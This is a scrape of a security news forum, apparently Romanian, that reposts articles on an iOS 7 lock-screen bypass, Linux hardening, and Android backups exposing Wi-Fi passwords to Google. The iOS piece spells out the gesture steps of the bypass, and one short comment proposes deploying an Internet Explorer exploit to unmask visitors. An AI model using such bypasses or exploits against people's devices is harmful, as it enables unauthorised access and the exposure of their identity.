this way, is following the example of the TSA. Sursa: NSA: Snowden was just doing his job | ZDNet
-
iOS 7 lock screen bypass flaw discovered, and how to fix it
Nytro posted a topic in Stiri securitate
iOS 7 lock screen bypass flaw discovered, and how to fix it Summary: UPDATED 2: The iOS 7 lock screen can be bypassed with a series of gesture techniques, despite the passcode. While apps are blurred out, a major Camera app bug exists, which can allow photos to be edited, deleted, and shared with others while the device is still locked. By Zack Whittaker for Zero Day | September 19, 2013 Just one day after Apple's latest mobile operating system iOS 7 was released to the public, one user discovered a security vulnerability in the software's lock screen. In a video posted online, Canary Islands-based soldier Jose Rodriguez detailed the flaw, which allowed him to access the multitasking view of the software without entering a passcode. With this, it's apparent which apps are open and how many notifications there are, as well as the device's home screen. The video, replicated below, shows the sequence of presses and taps that make this exploit possible, despite being fiddly and taking many attempts. The first step is to bring up the device's Control Center and accessing the Clock app, then hold down the power button until you are given the on-screen prompt to shut down the device. After you hit cancel, immediately double-tapping the home button brings up the multitasking view as expected. ZDNet confirmed this bug exists on an array of devices. In our New York newsroom, we tested on iOS 7 on an iPhone 4S, an iPhone 5, and the new iPhone 5c. All devices were exploited in the same way with the lock screen bypass technique, and all devices acted in exactly the same fashion. However, upon further examination, it's possible to access an array of photos under the Camera Roll, and thus access to sharing features — including Twitter. If the Camera app is opened first (provided it is accessible from the lock screen), by exploiting the same sequence of presses, the Camera Roll opens up. From here, images can be deleted, uploaded, edited, and shared with others. These screenshots were taken of an iPhone 4S, giving access to photos and sharing features, despite being locked with a passcode. (Image: ZDNet) You can see in the video (below) that even though the multitasking view — which offers a much larger view than previous iOS iterations — is viewable, the contents of the apps are not visible. iOS 7 blurs the contents of the apps, meaning would-be attackers cannot see what is going on. The only exception is the home screen, which is viewable, including which apps have been installed, along with the user's wallpaper. Despite the flaw, iOS 7 patches 80 security vulnerabilities, according to ZDNet's Larry Seltzer. But this kind of flaw, albeit minor, may not install a vast amount of confidence in users already jarred by the new design and user interface. Rodriguez also found a bug in iOS 6.1.3, which allowed potential hackers to access an iPhone running vulnerable software by ejecting the SIM card tray. Until Apple issues an official fix, iOS 7 users can simply disabling access to the Control Center on the lock screen. In Settings, then Control Center. From here, swipe the option on Access on Lock Screen so that it no longer displays on the lock screen. We put in a request for comment to Apple but did not hear back at the time of writing. An Apple spokesperson told AllThingsD, however, that the company is "aware" of the issue and will deliver a fix soon. Updated at 4:15 p.m. ET: with additional details regarding the Camera app. Also added additional attribution to Forbes, which was mistakenly omitted from the original piece. (via Forbes) Sursa: iOS 7 lock screen bypass flaw discovered, and how to fix it | ZDNet -
Intro To Linux System Hardening And Applying It To Your Pentest System Description: Chris Jenks (rattis) talks about hardening Linux and how you can apply that logic to your pentest system so you don't fall prey to the hack back. For More information please visit : - Security B-Sides / BSidesDetroitConversations Sursa: Intro To Linux System Hardening And Applying It To Your Pentest System
-
Mie imi spune mai multe acel "Internet Explorer". Pune si tu un exploit de IE si vezi tu cine sunt aia de fapt. Puf: https://community.rapid7.com/community/metasploit/blog/2013/05/05/department-of-labor-ie-0day-now-available-at-metasploit
-
Google knows nearly every Wi-Fi password in the world By Michael Horowitz September 12, 2013 10:44 PM EDT If an Android device (phone or tablet) has ever logged on to a particular Wi-Fi network, then Google probably knows the Wi-Fi password. Considering how many Android devices there are, it is likely that Google can access most Wi-Fi passwords worldwide. Recently IDC reported that 187 million Android phones were shipped in the second quarter of this year. That multiplies out to 748 million phones in 2013, a figure that does not include Android tablets. Many (probably most) of these Android phones and tablets are phoning home to Google, backing up Wi-Fi passwords along with other assorted settings. And, although they have never said so directly, it is obvious that Google can read the passwords. Sounds like a James Bond movie. Android devices have defaulted to coughing up Wi-Fi passwords since version 2.2. And, since the feature is presented as a good thing, most people wouldn't change it. I suspect that many Android users have never even seen the configuration option controlling this. After all, there are dozens and dozens of system settings to configure. And, anyone who does run across the setting can not hope to understand the privacy implication. I certainly did not. Specifically: In Android 2.3.4, go to Settings, then Privacy. On an HTC device, the option that gives Google your Wi-Fi password is "Back up my settings". On a Samsung device, the option is called "Back up my data". The only description is "Back up current settings and application data". No mention is made of Wi-Fi passwords. In Android 4.2, go to Settings, then "Backup and reset". The option is called "Back up my data". The description says "Back up application data, Wi-Fi passwords, and other settings to Google servers". Needless to say "settings" and "application data" are vague terms. A longer explanation of this backup feature in Android 2.3.4 can be found in the Users Guide on page 374: Check to back up some of your personal data to Google servers, with your Google Account. If you replace your phone, you can restore the data you’ve backed up, the first time you sign in with your Google Account. If you check this option, a wide variety of you personal data is backed up, including your Wi-Fi passwords, Browser bookmarks, a list of the applications you’ve installed, the words you’ve added to the dictionary used by the onscreen keyboard, and most of the settings that you configure with the Settings application. Some third-party applications may also take advantage of this feature, so you can restore your data if you reinstall an application. If you uncheck this option, you stop backing up your data to your account, and any existing backups are deleted from Google servers. A longer explanation for Android 4.0 can be found on page 97 of the Galaxy Nexus phone users Guide: If you check this option, a wide variety of your personal data is backed up automatically, including your Wi-Fi passwords, Browser bookmarks, a list of the apps you've installed from the Market app, the words you've added to the dictionary used by the onscreen keyboard, and most of your customized settings. Some third-party apps may also take advantage of this feature, so you can restore your data if you reinstall an app. If you uncheck this option, your data stops getting backed up, and any existing backups are deleted from Google servers. Sounds great. Backing up your data/settings makes moving to a new Android device much easier. It lets Google configure your new Android device very much like your old one. What is not said, is that Google can read the Wi-Fi passwords. And, if you are reading this and thinking about one Wi-Fi network, be aware that Android devices remember the passwords to every Wi-Fi network they have logged on to. The Register writes The list of Wi-Fi networks and passwords stored on a device is likely to extend far beyond a user's home, and include hotels, shops, libraries, friends' houses, offices and all manner of other places. Adding this information to the extensive maps of Wi-Fi access points built up over years by Google and others, and suddenly fandroids face a greater risk to their privacy if this data is scrutinised by outside agents. The good news is that Android owners can opt out just by turning off the checkbox. Update: Sept 15, 2013: Even if Google deletes every copy of your backed up data, they may already have been compelled to share it with others. And, Google will continue to have a copy of the password until every Android device that has ever connected to the network turns off the backing up of settings/data. The bad news is that, like any American company, Google can be compelled by agencies of the U.S. government to silently spill the beans. When it comes to Wi-Fi, the NSA, CIA and FBI may not need hackers and cryptographers. They may not need to exploit WPS or UPnP. If Android devices are offering up your secrets, WPA2 encryption and a long random password offer no protection. I doubt that Google wants to rat out their own customers. They may simply have no choice. What large public American company would? Just yesterday, Marissa Mayer, the CEO of Yahoo, said executives faced jail if they revealed government secrets. Lavabit felt there was a choice, but it was a single person operation. This is not to pick on Google exclusively. After all, Dropbox can read the files you store with them. So too, can Microsoft read files stored in SkyDrive. And, although the Washington Post reported back in April that Apple’s iMessage encryption foils law enforcement, cryptographer Matthew Green did a simple experiment that showed that Apple can read your iMessages. In fact, Green's experiment is pretty much the same one that shows that Google can read Wi-Fi passwords. He describes it: First, lose your iPhone. Now change your password using Apple's iForgot service ... Now go to an Apple store and shell out a fortune buying a new phone. If you can recover your recent iMessages onto a new iPhone -- as I was able to do in an Apple store this afternoon -- then Apple isn't protecting your iMessages with your password or with a device key. Too bad. Similarly, a brand new Android device can connect to Wi-Fi hotspots it is seeing for the very first time. Back in June 2011, writing for TechRepublic, Donovan Colbert described stumbling across this on a new ASUS Eee PC Transformer tablet: I purchased the machine late last night after work. I brought it home, set it up to charge overnight, and went to bed. This morning when I woke I put it in my bag and brought it to the office with me. I set up my Google account on the device, and then realized I had no network connection ... I pulled out my Virgin Mobile Mi-Fi 2200 personal hotspot and turned it on. I searched around Honeycomb looking for the control panel to select the hotspot and enter the encryption key. To my surprise, I found that the Eee Pad had already found the Virgin hotspot, and successfully attached to it ... As I looked further into this puzzling situation, I noticed that not only was my Virgin Hotspot discovered and attached, but a list of other hotspots ... were also listed in the Eee Pad's hotspot list. The only conclusion that one can draw from this is obvious - Google is storing not only a list of what hotspots you have visited, but any private encryption keys necessary to connect to those hotspots ... Micah Lee, staff technologist at the EFF, CTO of the Freedom of the Press Foundation and the maintainer of HTTPS Everywhere, blogged about the same situation back in July. When you format an Android phone and set it up on first run, after you login to your Google account and restore your backup, it immediately connects to wifi using a saved password. There’s no sort of password hash that your Android phone could send your router to authenticate besides the password itself. Google stores the passwords in a manner such that they can decrypt them, given only a Gmail address and password. Shortly after Lee's blog, Ars Technica picked up on this (see Does NSA know your Wi-Fi password? Android backups may give it to them). A Google spokesperson responded to the Ars article with a prepared statement. Our optional ‘Backup my data’ feature makes it easier to switch to a new Android device by using your Google Account and password to restore some of your previous settings. This helps you avoid the hassle of setting up a new device from scratch. At any point, you can disable this feature, which will cause data to be erased. This data is encrypted in transit, accessible only when the user has an authenticated connection to Google and stored at Google data centers, which have strong protections against digital and physical attacks. Sean Gallagher, who wrote the Ars article, added "The spokesperson could not speak to how ... the data was secured at rest." Lee responded to this with: ... it’s great the backup/restore feature is optional. It’s great that if you turn it off Google will delete your data. It’s great that the data is encrypted in transit between the Android device and Google’s servers, so that eavesdroppers can’t pull your backup data off the wire. And it’s great they they have strong security, both digital and physical, at their data centers. However, Google’s statement doesn’t mention whether or not Google itself has access to the plaintext backup data (it does)... [The issue is] Not how easy it is for an attacker to get at this data, but how easy it is for an authorized Google employee to get at it as part of their job. This is important because if Google has access to this plaintext data, they can be compelled to give it to the US government. Google danced around the issue of whether they can read the passwords because they don't want people like me writing blogs like this. Maybe this is why Apple, so often, says nothing. Eventually Lee filed an official Android feature request, asking Google to offer backups that are stored in such a way that only the end user (you and I) can access the data. The request was filed about two months ago and has been ignored by Google. I am not revealing anything new here. All this has been out in the public before. Below is a partial list of previous articles. However, this story has, on the whole, flown under the radar. Most tech outlets didn't cover it (Ars Technica and The Register being exceptions) for reasons that escape me. 1) Google knows where you've been and they might be holding your encryption keys. June 21, 2011 by Donovan Colbert for TechRepublic. This is the first article I was able to find on the subject. Colbert was not happy, writing: ... my corporate office has a public, protected wireless access point. The idea that every Android device that connects with that access point shares our private corporate access key with Google is pretty unacceptable ... This isn't just a trivial concern. The fact that my company can easily lose control of their own proprietary WPA2 encryption keys just by allowing a user with an Android device to use our wireless network is significant. It illustrates a basic lack of understanding on the ethics of dealing with sensitive corporate and personal data on the behalf of the engineers, programmers and leadership at Google. Honestly, if there is any data that shouldn't be harvested, stored and synched automatically between devices, it is encryption keys, passcodes and passwords. 2) Storage of credentials on the company servers Google by Android smartphones (translated from German). July 8, 2013. The University of Passau in Germany tells the university community to turn off Android backups because disclosing passwords to third parties is prohibited. They warn that submitting your password to any third party lets unauthorised people access University services under your identity. They also advise changing all passwords stored on Android devices. 3) Use Android? You’re Probably Giving Google All Your Wifi Passwords July 11, 2013 by Micah Lee. Where I first ran into this story. 4) Android and its password problems open doors for spies July 16, 2013 by The H Security in Germany. Excerpt: Tests ... at heise Security showed that after resetting an Android phone to factory settings and then synchronising with a Google account, the device was immediately able to connect to a heise test network secured using WPA2. Anyone with access to a Google account therefore has access to its Wi-Fi passwords. Given that Google maintains a database of Wi-Fi networks throughout the world for positioning purposes, this is a cause for concern in itself, as the backup means that it also has the passwords for these networks. In view of Google's generosity in sharing data with the NSA, this now looks even more troubling ... European companies are unlikely to be keen on the idea of this backup service, activated by default, allowing US secret services to access their networks with little effort. 5) Does NSA know your Wi-Fi password? Android backups may give it to them July 17, 2013 by Sean Gallagher for Ars Technica. This is the article referred to earlier. After this one story, Ars dropped the issue, which I find strange since they must have realized the implications. 6) Android backup sends unencrypted Wi-Fi passwords to Google July 18, 2013 by Zeljka Zorz for net-security.org 7) Would you tell Google your Wi-Fi password? You probably already did... July 18, 2013 by Paul Ducklin writing for the Sophos Naked Security blog. Ducklin writes ... the data is encrypted in transit, and Google (for all we know) probably stores it encrypted at the other end. But it's not encrypted in the sense of being inaccessible to anyone except you ... Google can unilaterally recover the plaintext of your Wi-Fi passwords, precisely so it can return those passwords to you quickly and conveniently ... 8) Android Backups Could Expose Wi-Fi Passwords to NSA July 19, 2013 by Ben Weitzenkorn of TechNewsDaily. This same story also appeared at nbcnews.com and mashable.com. 9) Despite Google’s statement, they still have access to your wifi passwords July 19, 2013 by Micah Lee on his personal blog. Lee rebuts the Google spokesperson response to the Ars Technica article. 10) Oi, Google, you ate all our Wi-Fi keys - don't let the spooks gobble them too July 23, 2013 by John Leyden for The Register. Leyden writes: "Privacy experts have urged Google to allow Android users' to encrypt their backups in the wake of the NSA PRISM surveillance flap." 11) Google: Keep Android Users' Secure Network Passwords Secure August 5, 2013 by Micah Lee and David Grant of the EFF. They write Fixing the flaw is more complicated than it might seem. Android is an open source operating system developed by Google. Android Backup Service is a proprietary service offered by Google, which runs on Android. Anyone can write new code for Android, but only Google can change the Android Backup Service. To conclude on a Defensive Computing note, those that need Wi-Fi at home should consider using a router offering a guest network. Make sure that Android devices accessing the private network are not backing up settings to Google. This is not realistic for the guest network, but you can enable the guest network only when needed and then shut it down afterwards. Also, you can periodically change the password of the guest network without impacting your personal wireless devices. At this point, everybody should probably change their Wi-Fi password. Sursa: Google knows nearly every Wi-Fi password in the world | Computerworld Blogs